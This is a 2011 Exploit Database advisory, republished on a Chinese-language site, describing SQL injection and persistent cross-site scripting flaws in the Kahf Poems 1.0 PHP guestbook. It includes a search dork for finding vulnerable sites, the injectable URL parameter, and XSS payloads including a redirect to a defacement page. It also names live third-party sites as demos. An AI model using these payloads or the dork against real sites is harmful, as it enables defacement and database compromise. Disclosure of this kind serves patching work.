Kahf Poems 1.0 – Multiple Vulnerabilities

• Exploit Database
• 122 阅读

• 作者： Yassin Aboukir
  日期： 2011-08-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17661/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68

  ################################################################################################ [+] Title: Kahf Poems V1.0 (guestbook.php) SQL Injection [+] Name : Kahf Poems [+] Affected Version : v1.0 [+] Software Link: http://www.traidnt.net/vb/traidnt19736/ [+] Tested on: (L):Vista & Windows Xp and Windows 7 [+] Date : 13/08/2011 [+] Dork : "intitle:Kahf Poems -> v 1.0 beta"& "inurl:guestbook.php?diwan_id=" ################################################################################################# [+] Author : Yassin Aboukir [+] Contact: 01Xp01@Gmail.com [+] Site : http://www.yaboukir.com #################################################################################################     [+] Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &apos;\&apos;,10&apos; at line 1   [+] How to exploit :   http://localhost/Path/guestbook.php?diwan_id=8&action=view&offset=1[SQL HERE]   [+] Fix : upgrade to last release (v3)     [+] Special Thanks to Ayoub Aboukir & All Friends ...   [+] Demos : http://www.yaaam.com/poems/guestbook.php?diwan_id=8&action=view&offset=1&apos; http://www.yaaam.com/poems/guestbook.php?diwan_id=8&action=view&offset=5860&apos;   ################################################################################################ [+] Title: Kahf Poems V1.0 (guestbook.php) Persistent XSS [+] Name : Kahf Poems [+] Affected Version : v1.0 [+] Software Link: http://www.traidnt.net/vb/traidnt19736/ [+] Tested on: (L):Vista & Windows Xp and Windows 7 [+] Date : 13/08/2011 [+] Dork : "intitle:Kahf Poems -> v 1.0 beta"& "inurl:guestbook.php?diwan_id=" ################################################################################################# [+] Author : Yassin Aboukir [+] Contact: 01Xp01@Gmail.com [+] Site : http://www.yaboukir.com #################################################################################################   [+] Details: Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables attackers to inject client-side script into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy.   [+] How to exploit :   1- Go there : http://localhost/Path/guestbook.php?action=addnew&diwan_id=1 .   2- Put in Body field the XSS Code. Example 1: <META http-equiv="refresh" content="0;URL=http://www.Deface-page.com">. Example 2: <script>alert(&apos;Xssed by The W0rm&apos;)</script>   3- Put anything in the other field ( Name & E-mail).   4- Now anyone go to the guestbook page will redirected to your own paege OR exploit your XSS Code.     [+] Fix : upgrade to last release.     [+] Special Thanks to Ayoub Aboukir & All Friends ...   [+] Demos : http://www.yaaam.com/poems/guestbook.php?diwan_id=1&action=view&offset=0 http://www.alalarja.com/poems/guestbook.php?diwan_id=1&action=view&offset=0